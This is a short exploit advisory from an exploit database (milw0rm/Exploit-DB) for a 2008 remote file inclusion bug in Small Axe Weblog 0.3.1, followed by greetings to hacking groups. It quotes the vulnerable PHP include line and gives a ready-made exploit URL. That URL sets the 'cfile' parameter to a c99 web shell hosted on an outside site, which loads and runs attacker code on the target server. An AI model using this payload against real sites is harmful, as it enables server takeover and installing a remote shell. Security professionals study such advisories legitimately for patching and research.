Exploit Small Axe 0.3.1 - 'cfile' Remote File Inclusion

[Exploiter]

EDB-ID

4937

Проверка EDB

1. Пройдено

Автор

ROMANCYXHACKER

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-0442 cve-2008-0376

Дата публикации

2008-01-18

# Name : Small Axe Weblog 0.3.1  Remote File Include
# Download From : http://releases.smallaxesolutions.com/smallaxe-0.3.1.zip
# Found By : RoMaNcYxHaCkEr                  We Are H-T TeaM (Houssamix - ToXiC)
# Home Page : Not Yet  :(      Tryag.cc/cc        No-Hack.net     V99x.com/vb               Hackteach.org/cc     

============================================================================

# Vulne Code In File linkbar.php In Line 1 :


include_once($cfile);

# Exploit :

http://Www.RxH.CoM/smallaxe-0.3.1/inc/linkbar.php?cfile=http://no-hack.net/shells/c99.txt?

That,s It,s

Good Luck Everybody
============================================================================

# Greet To :

"Cold Z3ro My Master , !!Hack-back!!" (Hackteach.org)

Tryag TeaM :"Mahmood_ali , cRMINEL_NET , Mohajer22 , Dr-Ha!l , LoVeRs Hacker , Abdullah00 , Athabi Ker , Mr-Wolf ...etc"  (Tryag.com)

Hack15 TeaM :"GeNiUs-HaCkEr , Mr-AljoOOker , Mr-Shares , So9or , KsA HaCkEr ...etc" (V99x.com)

Sniper-Sa TeaM :"Sniper-sa , Golden-Hacker , Sho3ter , VerySecret , nOUR-Ice ....etc"(Sniper-sa.com)

Yee7 TeaM : "ShockShadow ( My Best Friend ), HoUrIcAn , ...etc"(Yee7.com)

H-T TeaM : " Houusamix , ToXiC "(no-hack.net)

Str0ck (Milw0rm.com)

Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , AlQaTaRi , God-Father And All My Friends

# For Contact : [email protected]

# Note : Alwayse Don,t See In The Top To Feeling Pain In Your Neck !!!

Best Wishes

# milw0rm.com [2008-01-18]